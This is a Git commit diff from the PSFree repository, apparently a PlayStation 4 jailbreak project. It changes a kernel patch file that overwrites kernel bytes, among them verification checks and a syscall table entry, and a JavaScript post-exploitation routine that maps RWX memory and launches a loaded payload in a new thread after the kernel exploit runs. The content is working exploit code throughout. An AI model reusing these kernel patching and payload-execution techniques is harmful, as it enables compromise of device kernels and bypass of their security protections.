Seth/PSFree
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'main' into main

Browse Source
This commit is contained in:
Kameleon
2025-05-29 04:01:11 -06:00
committed by GitHub
parent ce3aa59883 5137f7bf53
commit 54958c9a7d
4 changed files with 43 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files
kpatch/900.c
+3 -2
View File
@@ -97,9 +97,10 @@ void do_patch(void) {
write8(kbase, KERNEL_copyinstr, 0xEB);
write8(kbase, KERNEL_copystr, 0xEB);
write16(kbase, KERNEL_veriPatch, 0x9090);
write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F);
write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F);
const size_t offset_sysent_11 = 0x1100520;
write32(kbase, offset_sysent_11, 2);
write32(kbase, offset_sysent_11, 6);
write64(kbase, offset_sysent_11 + 8, kbase + 0x4c7ad);
write32(kbase, offset_sysent_11 + 0x2c, 1);
kpatch/900.elf
BIN
View File
Binary file not shown.
kpatch/900.o
BIN
View File
Binary file not shown.
lapse.mjs
+40 -1
View File
@@ -1739,7 +1739,7 @@ export async function kexploit() {
}
}
kexploit().then(() => {
/*kexploit().then(() => {
var payload_buffer = chain.sysp('mmap', new Int(0x26200000, 0x9), 0x300000, PROT_READ | PROT_WRITE | PROT_EXEC, 0x41000, -1, 0);
var payload_loader = new View4(window.pld);
chain.sys('mprotect', payload_loader.addr, payload_loader.size, PROT_READ | PROT_WRITE | PROT_EXEC);
@@ -1754,4 +1754,43 @@ kexploit().then(() => {
payload_loader.addr,
payload_buffer,
);
})*/
kexploit().then(() => {
function malloc(sz) {
var backing = new Uint8Array(0x10000 + sz);
nogc.push(backing);
var ptr = mem.readp(mem.addrof(backing).add(0x10));
ptr.backing = backing;
return ptr;
}
function malloc32(sz) {
var backing = new Uint8Array(0x10000 + sz * 4);
nogc.push(backing);
var ptr = mem.readp(mem.addrof(backing).add(0x10));
ptr.backing = new Uint32Array(backing.buffer);
return ptr;
}
window.pld_size = new Int(0x26200000, 0x9);
var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
var payload = window.pld;
var bufLen = payload.length * 4
var payload_loader = malloc32(bufLen);
var loader_writer = payload_loader.backing;
for (var i = 0; i < payload.length; i++) {
loader_writer[i] = payload[i];
}
chain.sys('mprotect', payload_loader, bufLen, (0x1 | 0x2 | 0x4));
var pthread = malloc(0x10);
call_nze(
'pthread_create',
pthread,
0,
payload_loader,
payload_buffer,
);
})